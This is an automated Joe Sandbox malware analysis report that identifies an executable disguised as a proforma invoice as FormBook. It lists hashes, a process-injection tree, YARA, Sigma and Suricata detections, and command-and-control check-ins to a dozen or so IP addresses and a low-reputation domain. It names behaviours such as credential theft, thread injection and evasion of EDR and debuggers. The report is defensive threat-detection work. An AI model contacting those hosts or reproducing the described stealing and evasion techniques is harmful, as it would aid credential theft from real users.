Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma invoice - Arancia NZ.exe

Overview

General Information

Sample name:Proforma invoice - Arancia NZ.exe
Analysis ID:1566688
MD5:a4c3a56e6258ea94065bf7151009d43c
SHA1:c4d4d96374381d46051521ff82d3bf9bfb405c38
SHA256:87e59a4758499e2544872d9ad64c561b1fc62290c4420fd9caca07f0e6e830aa
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Proforma invoice - Arancia NZ.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe" MD5: A4C3A56E6258EA94065BF7151009D43C)
    • svchost.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • nfGtWoQBhJSQ.exe (PID: 4580 cmdline: "C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 5272 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • nfGtWoQBhJSQ.exe (PID: 728 cmdline: "C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine|base64offset|contains: {, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ParentImage: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe, ParentProcessId: 4952, ParentProcessName: Proforma invoice - Arancia NZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ProcessId: 6596, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine|base64offset|contains: {, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ParentImage: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe, ParentProcessId: 4952, ParentProcessName: Proforma invoice - Arancia NZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ProcessId: 6596, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T15:23:39.782792+010028554651A Network Trojan was detected192.168.2.549751202.92.5.2380TCP
                2024-12-02T15:24:05.071840+010028554651A Network Trojan was detected192.168.2.54980913.248.169.4880TCP
                2024-12-02T15:24:20.056219+010028554651A Network Trojan was detected192.168.2.549846209.74.77.10980TCP
                2024-12-02T15:24:35.928548+010028554651A Network Trojan was detected192.168.2.549883202.79.161.15180TCP
                2024-12-02T15:24:50.989606+010028554651A Network Trojan was detected192.168.2.54992046.30.211.3880TCP
                2024-12-02T15:25:06.141856+010028554651A Network Trojan was detected192.168.2.549955103.224.182.24280TCP
                2024-12-02T15:25:22.080569+010028554651A Network Trojan was detected192.168.2.549992149.88.81.19080TCP
                2024-12-02T15:25:37.661755+010028554651A Network Trojan was detected192.168.2.550004101.35.209.18380TCP
                2024-12-02T15:25:53.002213+010028554651A Network Trojan was detected192.168.2.55000838.47.232.20280TCP
                2024-12-02T15:26:08.807723+010028554651A Network Trojan was detected192.168.2.550012208.91.197.3980TCP
                2024-12-02T15:26:24.548736+010028554651A Network Trojan was detected192.168.2.55001643.205.198.2980TCP
                2024-12-02T15:26:40.068178+010028554651A Network Trojan was detected192.168.2.550020172.67.187.11480TCP
                2024-12-02T15:26:55.202013+010028554651A Network Trojan was detected192.168.2.550024172.67.167.14680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T15:23:56.759707+010028554641A Network Trojan was detected192.168.2.54979013.248.169.4880TCP
                2024-12-02T15:23:59.548725+010028554641A Network Trojan was detected192.168.2.54979713.248.169.4880TCP
                2024-12-02T15:24:02.373348+010028554641A Network Trojan was detected192.168.2.54980413.248.169.4880TCP
                2024-12-02T15:24:11.910522+010028554641A Network Trojan was detected192.168.2.549825209.74.77.10980TCP
                2024-12-02T15:24:14.605227+010028554641A Network Trojan was detected192.168.2.549832209.74.77.10980TCP
                2024-12-02T15:24:17.349205+010028554641A Network Trojan was detected192.168.2.549839209.74.77.10980TCP
                2024-12-02T15:24:27.581133+010028554641A Network Trojan was detected192.168.2.549863202.79.161.15180TCP
                2024-12-02T15:24:30.299853+010028554641A Network Trojan was detected192.168.2.549869202.79.161.15180TCP
                2024-12-02T15:24:33.049846+010028554641A Network Trojan was detected192.168.2.549875202.79.161.15180TCP
                2024-12-02T15:24:42.989311+010028554641A Network Trojan was detected192.168.2.54989946.30.211.3880TCP
                2024-12-02T15:24:45.641832+010028554641A Network Trojan was detected192.168.2.54990546.30.211.3880TCP
                2024-12-02T15:24:48.362326+010028554641A Network Trojan was detected192.168.2.54991446.30.211.3880TCP
                2024-12-02T15:24:58.149770+010028554641A Network Trojan was detected192.168.2.549936103.224.182.24280TCP
                2024-12-02T15:25:00.822710+010028554641A Network Trojan was detected192.168.2.549942103.224.182.24280TCP
                2024-12-02T15:25:03.552588+010028554641A Network Trojan was detected192.168.2.549948103.224.182.24280TCP
                2024-12-02T15:25:14.002988+010028554641A Network Trojan was detected192.168.2.549972149.88.81.19080TCP
                2024-12-02T15:25:16.675008+010028554641A Network Trojan was detected192.168.2.549981149.88.81.19080TCP
                2024-12-02T15:25:19.331148+010028554641A Network Trojan was detected192.168.2.549987149.88.81.19080TCP
                2024-12-02T15:25:29.612576+010028554641A Network Trojan was detected192.168.2.550001101.35.209.18380TCP
                2024-12-02T15:25:32.284329+010028554641A Network Trojan was detected192.168.2.550002101.35.209.18380TCP
                2024-12-02T15:25:34.956723+010028554641A Network Trojan was detected192.168.2.550003101.35.209.18380TCP
                2024-12-02T15:25:44.862317+010028554641A Network Trojan was detected192.168.2.55000538.47.232.20280TCP
                2024-12-02T15:25:47.536739+010028554641A Network Trojan was detected192.168.2.55000638.47.232.20280TCP
                2024-12-02T15:25:50.206089+010028554641A Network Trojan was detected192.168.2.55000738.47.232.20280TCP
                2024-12-02T15:26:00.206507+010028554641A Network Trojan was detected192.168.2.550009208.91.197.3980TCP
                2024-12-02T15:26:03.231207+010028554641A Network Trojan was detected192.168.2.550010208.91.197.3980TCP
                2024-12-02T15:26:05.592145+010028554641A Network Trojan was detected192.168.2.550011208.91.197.3980TCP
                2024-12-02T15:26:16.533640+010028554641A Network Trojan was detected192.168.2.55001343.205.198.2980TCP
                2024-12-02T15:26:19.222695+010028554641A Network Trojan was detected192.168.2.55001443.205.198.2980TCP
                2024-12-02T15:26:21.883704+010028554641A Network Trojan was detected192.168.2.55001543.205.198.2980TCP
                2024-12-02T15:26:31.596620+010028554641A Network Trojan was detected192.168.2.550017172.67.187.11480TCP
                2024-12-02T15:26:34.268653+010028554641A Network Trojan was detected192.168.2.550018172.67.187.11480TCP
                2024-12-02T15:26:36.940519+010028554641A Network Trojan was detected192.168.2.550019172.67.187.11480TCP
                2024-12-02T15:26:47.190348+010028554641A Network Trojan was detected192.168.2.550021172.67.167.14680TCP
                2024-12-02T15:26:49.862196+010028554641A Network Trojan was detected192.168.2.550022172.67.167.14680TCP
                2024-12-02T15:26:52.524614+010028554641A Network Trojan was detected192.168.2.550023172.67.167.14680TCP
                2024-12-02T15:27:02.582526+010028554641A Network Trojan was detected192.168.2.55002574.48.143.8280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Proforma invoice - Arancia NZ.exeReversingLabs: Detection: 47%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Proforma invoice - Arancia NZ.exeJoe Sandbox ML: detected
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nfGtWoQBhJSQ.exe, 00000004.00000002.4468208625.000000000003E000.00000002.00000001.01000000.00000005.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371266085.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_002B445A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BC6D1 FindFirstFileW,FindClose,0_2_002BC6D1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002BC75C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BEF95
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BF0F2
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BF3F3
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B37EF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B3B12
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BBCBC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49751 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49804 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49797 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49809 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49832 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49790 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49846 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49869 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49863 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49920 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49914 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49936 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49942 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49899 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49883 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49948 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49875 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.187.114:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.187.114:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.187.114:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.187.114:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49955 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49825 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 149.88.81.190:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.optimismbank.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
